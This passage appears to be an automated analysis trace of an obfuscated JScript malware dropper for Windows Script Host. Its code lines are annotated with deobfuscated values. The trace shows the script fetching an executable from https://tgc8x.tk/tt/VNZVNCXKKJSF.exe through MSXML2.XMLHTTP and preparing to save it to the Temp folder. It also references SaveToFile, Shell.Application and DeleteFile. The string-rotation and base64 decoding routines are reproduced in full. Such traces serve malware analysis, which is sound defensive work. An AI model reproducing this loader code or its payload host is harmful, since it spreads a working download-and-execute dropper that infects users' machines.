Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu
67	return _0x1c3e =
68	function (_0x366407, _0x13f8d0) {	_0x1c3e(140,undefined) ➔ "463900CaNtRp" _0x1c3e(134,undefined) ➔ "xSkvWPCOWOniFvTXeCkMbCkL" _0x1c3e(140,undefined) ➔ "1268392teACcP" _0x1c3e(134,undefined) ➔ "5QEmMYO" _0x1c3e(138,undefined) ➔ "76392yWuOtG" _0x1c3e(128,undefined) ➔ "279BGVghm" _0x1c3e(131,undefined) ➔ "Scripting.FileSystemObject" _0x1c3e(142,undefined) ➔ "\VNZVNCXKKJSF.exe" _0x1c3e(135,undefined) ➔ "MSXML2.XMLHTTP" _0x1c3e(117,undefined) ➔ "Open"
69	_0x366407 = _0x366407 - 0x6e;
70	var _0xbb7100 = _0x35b3aa[_0x366407];
71	return _0xbb7100;
72	}, _0x1c3e ( _0x27f080, _0x17fea0 );
73	}
74	var _0x155c25 = _0x5b6c, _0x115fc7 = _0x1c3e;
75	( function (_0x16801f, _0x374a29) {	(function _0x4a61(),265012) ➔ undefined (function _0x4a61(),265012) ➔ undefined
76	var _0x16324c = _0xe99d, _0x2e5130 = _0x5099, _0x319ed0 = _0x1c3e, _0x3b90fe = _0x5b6c, _0x2e4578 = _0x16801f ( );	_0x4a61() ➔ Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD
77	while (! ! [ ] )
78	{
79	try
80	{
81	var _0x10039f = - parseInt ( _0x3b90fe ( 0x7a, _0x2e5130 ( 0xeb, 'OS$Q' ) ) ) / 0x1 + - parseInt ( _0x3b90fe ( 0x7b, _0x2e5130 ( 0xce, 'EzL#' ) ) ) / 0x2 + - parseInt ( _0x3b90fe ( 0x8d, _0x16324c ( 0xfc ) ) ) / 0x3 + parseInt ( _0x319ed0 ( 0x8c ) ) / 0x4 * ( - parseInt ( _0x319ed0 ( 0x86 ) ) / 0x5 ) + parseInt ( _0x3b90fe ( 0x81, _0x16324c ( 0xe2 ) ) ) / 0x6 * ( parseInt ( _0x3b90fe ( 0x91, 'mh&D' ) ) / 0x7 ) + - parseInt ( _0x319ed0 ( 0x8a ) ) / 0x8 * ( parseInt ( _0x319ed0 ( 0x80 ) ) / 0x9 ) + parseInt ( _0x3b90fe ( 0x89, _0x16324c ( 0xdd ) ) ) / 0xa;	_0x2e5130(235,"OS$Q") ➔ "mX5" _0x5b6c(122,"mX5") ➔ undefined _0x2e5130(235,"OS$Q") ➔ "mX5" _0x5b6c(122,"mX5") ➔ " ,8f`\xfa\xa1\xfd?\xf9g\x02" parseInt(" ,8f`\xfa\xa1\xfd?\xf9g\x02") ➔ NaN _0x2e5130(206,"EzL#") ➔ "RY1%" _0x5b6c(123,"RY1%") ➔ "s\xa8\xc3G!k\xbdq; Ki" parseInt("s\xa8\xc3G!k\xbdq; Ki") ➔ NaN _0x16324c(252) ➔ "W)L8" _0x5b6c(141,"W)L8") ➔ "\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1" parseInt("\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1") ➔ NaN _0x1c3e(140) ➔ "463900CaNtRp" parseInt("463900CaNtRp") ➔ 463900 _0x1c3e(134) ➔ "xSkvWPCOWOniFvTXeCkMbCkL" parseInt("xSkvWPCOWOniFvTXeCkMbCkL") ➔ NaN _0x16324c(226) ➔ "4(W" _0x5b6c(129,"4(W") ➔ undefined _0x2e5130(235,"OS$Q") ➔ "mX5" _0x5b6c(122,"mX5") ➔ "\xd2\x8e\x12\xc6"\xb2jr~hb\xdc" parseInt("\xd2\x8e\x12\xc6"\xb2jr~hb\xdc") ➔ NaN _0x2e5130(206,"EzL#") ➔ "RY1%" _0x5b6c(123,"RY1%") ➔ undefined _0x2e5130(235,"OS$Q") ➔ "mX5" _0x5b6c(122,"mX5") ➔ undefined _0x2e5130(235,"OS$Q") ➔ "mX5" _0x5b6c(122,"mX5") ➔ undefined _0x2e5130(235,"OS$Q") ➔ "mX5" _0x5b6c(122,"mX5") ➔ undefined _0x2e5130(235,"OS$Q") ➔ "mX5" _0x3b90fe(122,"mX5") ➔ undefined _0x2e5130(235,"OS$Q") ➔ "mX5" _0x3b90fe(122,"mX5") ➔ undefined _0x2e5130(235,"OS$Q") ➔ "mX5" _0x3b90fe(122,"mX5") ➔ undefined _0x2e5130(235,"OS$Q") ➔ "mX5" _0x3b90fe(122,"mX5") ➔ "\xad\xd2O\xdb\x91\xd5\xc4\xa3V\xfa\x04\xefs\x0b" parseInt("\xad\xd2O\xdb\x91\xd5\xc4\xa3V\xfa\x04\xefs\x0b") ➔ NaN _0x2e5130(206,"EzL#") ➔ "RY1%" _0x3b90fe(123,"RY1%") ➔ undefined parseInt("\xe4\x88}") ➔ NaN _0x2e5130(206,"EzL#") ➔ "RY1%" _0x3b90fe(123,"RY1%") ➔ undefined parseInt("\x00\x9e\x10\xc7_vd\x1cJ\xeb\x84\xbf\xf9") ➔ NaN _0x2e5130(206,"EzL#") ➔ "RY1%" _0x3b90fe(123,"RY1%") ➔ undefined parseInt("\x97\xd6\x18\x03\xf96O\x13") ➔ NaN _0x2e5130(206,"EzL#") ➔ "RY1%" _0x3b90fe(123,"RY1%") ➔ undefined parseInt("\x98\x9es\xd5\xe6\x8d\x9a\x8c;w]\x1a{") ➔ NaN _0x2e5130(206,"EzL#") ➔ "RY1%" _0x3b90fe(123,"RY1%") ➔ "\x02\xd0H\x83\xabal\x81\xed\xf1\x9d\xff\xcf" parseInt("\x02\xd0H\x83\xabal\x81\xed\xf1\x9d\xff\xcf") ➔ NaN _0x16324c(252) ➔ "W)L8" _0x3b90fe(141,"W)L8") ➔ undefined parseInt("\xa3\xf6\x99\x02\xa8\xb8\xbb\x82\xa8\x94\xb4J\xdc") ➔ NaN _0x2e5130(206,"EzL#") ➔ "RY1%" _0x3b90fe(123,"RY1%") ➔ "\xc5\xc7PX\x02\x89\xf5\x80lb\xd7\xf3.\x82\xd9" parseInt("\xc5\xc7PX\x02\x89\xf5\x80lb\xd7\xf3.\x82\xd9") ➔ NaN _0x16324c(252) ➔ "W)L8" _0x3b90fe(141,"W)L8") ➔ undefined parseInt("\x8b\xe3\x16\xd1[\xdb^\xf6\xc5 Kb\xe09\x8e\x89") ➔ NaN _0x2e5130(206,"EzL#") ➔ "RY1%" _0x3b90fe(123,"RY1%") ➔ "42NTWCLY" parseInt("42NTWCLY") ➔ 42 _0x16324c(252) ➔ "W)L8" _0x3b90fe(141,"W)L8") ➔ undefined parseInt("\x95\x14\x9f\xd5T\x9a\x9bZ") ➔ NaN _0x2e5130(206,"EzL#") ➔ "RY1%" _0x3b90fe(123,"RY1%") ➔ undefined parseInt("\x95\x10\xe2\xb83\xe9\x94b\x0b\x11{\xc5") ➔ NaN _0x16324c(252) ➔ "W)L8" _0x3b90fe(141,"W)L8") ➔ undefined parseInt("995898DfgeKn") ➔ 995898 _0x16324c(252) ➔ "W)L8" _0x3b90fe(141,"W)L8") ➔ "1123059fOWHRS" parseInt("1123059fOWHRS") ➔ 1123059 _0x1c3e(140) ➔ "1268392teACcP" parseInt("1268392teACcP") ➔ 1268392 _0x1c3e(134) ➔ "5QEmMYO" parseInt("5QEmMYO") ➔ 5 _0x16324c(226) ➔ "4(W" _0x3b90fe(129,"4(W") ➔ "428748eDivLq" parseInt("428748eDivLq") ➔ 428748 _0x3b90fe(145,"mh&D") ➔ "42NTWCLY" parseInt("42NTWCLY") ➔ 42 _0x1c3e(138) ➔ "76392yWuOtG" parseInt("76392yWuOtG") ➔ 76392 _0x1c3e(128) ➔ "279BGVghm" parseInt("279BGVghm") ➔ 279 _0x16324c(221) ➔ "vUkl" _0x3b90fe(137,"vUkl") ➔ "17855830DsYtJo" parseInt("17855830DsYtJo") ➔ 17855830
82	if ( _0x10039f === _0x374a29 )
83	break ;
84	else
85	_0x2e4578[_0x16324c ( 0x101 ) ] ( _0x2e4578[_0x16324c ( 0xd6 ) ] ( ) );
86	}
87	catch ( _0x341c60 )
88	{
89	_0x2e4578['push'] ( _0x2e4578[_0x16324c ( 0xd6 ) ] ( ) );	_0x16324c(214) ➔ "shift" _0x16324c(214) ➔ "shift" _0x16324c(214) ➔ "shift" _0x16324c(214) ➔ "shift" _0x16324c(214) ➔ "shift" _0x16324c(214) ➔ "shift" _0x16324c(214) ➔ "shift" _0x16324c(214) ➔ "shift" _0x16324c(214) ➔ "shift" _0x16324c(214) ➔ "shift"
90	}
91	}
92	} ( _0x4a61, 0x40b34 ) );
93	var pOut = new ActiveXObject ( _0x115fc7 ( 0x83 ) ) [_0x155c25 ( 0x72, 'BQ9o' ) ] ( 0x2 ) + _0x115fc7 ( 0x8e ), Object = WScript[_0x155c25 ( 0x82, _0x56566c ( 0xe1 ) ) ] ( _0x115fc7 ( 0x87 ) );	_0x1c3e(131) ➔ "Scripting.FileSystemObject" _0x155c25(114,"BQ9o") ➔ "GetSpecialFolder" GetSpecialFolder(2) ➔ C:\Users\engineer\AppData\Local\Temp _0x1c3e(142) ➔ "\VNZVNCXKKJSF.exe" _0x56566c(225) ➔ "Bhsp" _0x155c25(130,"Bhsp") ➔ "CreateObject" _0x1c3e(135) ➔ "MSXML2.XMLHTTP" Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
94	Object[_0x115fc7 ( 0x75 ) ] ( _0x155c25 ( 0x8b, 'QaXE' ), _0x115fc7 ( 0x84 ), ! [] ), Object[_0x115fc7 ( 0x74 ) ] ( );	_0x1c3e(117) ➔ "Open" _0x155c25(139,"QaXE") ➔ "GET" _0x115fc7(132) ➔ "https://tgc8x.tk/tt/VNZVNCXKKJSF.exe" Open("GET","https://tgc8x.tk/tt/VNZVNCXKKJSF.exe",false) ➔ undefined _0x115fc7(116) ➔ "Send" Send() ➔ undefined
95	function _0x5b6c(_0x573185, _0x30822b) {	_0x5b6c(122,"mX5") ➔ undefined _0x5b6c(122,"mX5") ➔ " ,8f`\xfa\xa1\xfd?\xf9g\x02" _0x5b6c(123,"RY1%") ➔ "s\xa8\xc3G!k\xbdq; Ki" _0x5b6c(141,"W)L8") ➔ "\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1" _0x5b6c(129,"4(W") ➔ undefined _0x5b6c(122,"mX5") ➔ "\xd2\x8e\x12\xc6"\xb2jr~hb\xdc" _0x5b6c(123,"RY1%") ➔ undefined _0x5b6c(122,"mX5") ➔ undefined _0x5b6c(122,"mX5") ➔ undefined _0x5b6c(122,"m*X5") ➔ undefined
96	var _0x3d4abd = _0x4a61 ( );	_0x4a61() ➔ Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send _0x4a61() ➔ DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open _0x4a61() ➔ DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open _0x4a61() ➔ ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile _0x4a61() ➔ 428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW _0x4a61() ➔ uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq
97	return _0x5b6c =
98	function (_0x10ff05, _0x54c045) {	_0x5b6c(122,"mX5") ➔ undefined _0x5b6c(122,"mX5") ➔ " ,8f`\xfa\xa1\xfd?\xf9g\x02" _0x5b6c(123,"RY1%") ➔ "s\xa8\xc3G!k\xbdq; Ki" _0x5b6c(141,"W)L8") ➔ "\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1" _0x5b6c(129,"4(W") ➔ undefined _0x5b6c(122,"mX5") ➔ "\xd2\x8e\x12\xc6"\xb2jr~hb\xdc" _0x5b6c(123,"RY1%") ➔ undefined _0x5b6c(122,"mX5") ➔ undefined _0x5b6c(122,"mX5") ➔ undefined _0x5b6c(122,"m*X5") ➔ undefined
99	var _0x21482c = _0x5099, _0x562b2c = _0xe99d;
100	_0x10ff05 = _0x10ff05 - 0x6e;
101	var _0x325444 = _0x3d4abd[_0x10ff05];
102	if ( _0x5b6c[_0x562b2c ( 0xe3 ) ] === undefined )	_0x562b2c(227) ➔ "qCVKfY" _0x562b2c(227) ➔ "qCVKfY" _0x562b2c(227) ➔ "qCVKfY" _0x562b2c(227) ➔ "qCVKfY" _0x562b2c(227) ➔ "qCVKfY" _0x562b2c(227) ➔ "qCVKfY" _0x562b2c(227) ➔ "qCVKfY" _0x562b2c(227) ➔ "qCVKfY" _0x562b2c(227) ➔ "qCVKfY" _0x562b2c(227) ➔ "qCVKfY"
103	{
104	var _0x1c1988 = function (_0x985f2d) {	_0x1c1988("279BGVghm") ➔ undefined _0x1c1988("vcFcV8kjWRZdHmk4WROea0xcUa") ➔ "T'\xbf\x89\xbc\xc4\xb8\xba\x04\x03E\xb8" _0x1c1988("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f" _0x1c1988("W4BcLCo0oJRcS8kdW4SaWO1/WQaN") ➔ "\xc6\x95\xf4::\xb3\x83\xcb\x00\x8d\x7f\xa0'" _0x1c1988("Type") ➔ undefined _0x1c1988("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f" _0x1c1988("Scripting.FileSystemObject") ➔ undefined _0x1c1988("Scripting.FileSystemObject") ➔ undefined _0x1c1988("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe") ➔ undefined _0x1c1988("995898DfgeKn") ➔ undefined
105	var _0x14c45f = _0x5099, _0x1315bc = _0x562b2c, _0x2441a2 = _0x1315bc ( 0xd2 ), _0x5162e5 = '', _0x2d3365 = '';	_0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=" _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=" _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=" _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=" _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=" _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=" _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=" _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=" _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=" _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
106	for ( var _0xc99301 = 0x0, _0x2a3829, _0x20589b, _0x13f1ea = 0x0 ; _0x20589b = _0x985f2d[_0x14c45f ( 0xfb, 'cLA8' ) ] ( _0x13f1ea ++ ) ; ~ _0x20589b && ( _0x2a3829 = _0xc99301 % 0x4 ? _0x2a3829 * 0x40 + _0x20589b : _0x20589b, _0xc99301 ++ % 0x4 ) ? _0x5162e5 += String[_0x1315bc ( 0xdc ) ] ( 0xff & _0x2a3829 >> ( - 0x2 * _0xc99301 & 0x6 ) ) : 0x0 )	_0x14c45f(251,"cLA8") ➔ "charAt" _0x14c45f(251,"cLA8") ➔ "charAt" _0x1315bc(220) ➔ "fromCharCode" _0x14c45f(251,"cLA8") ➔ "charAt" _0x1315bc(220) ➔ "fromCharCode" _0x14c45f(251,"cLA8") ➔ "charAt" _0x1315bc(220) ➔ "fromCharCode" _0x14c45f(251,"cLA8") ➔ "charAt" _0x14c45f(251,"cLA8") ➔ "charAt" _0x1315bc(220) ➔ "fromCharCode" _0x14c45f(251,"cLA8") ➔ "charAt" _0x1315bc(220) ➔ "fromCharCode" _0x14c45f(251,"cLA8") ➔ "charAt" _0x1315bc(220) ➔ "fromCharCode" _0x14c45f(251,"cLA8") ➔ "charAt" _0x14c45f(251,"cLA8") ➔ "charAt" _0x1315bc(220) ➔ "fromCharCode" _0x1315bc(220) ➔ 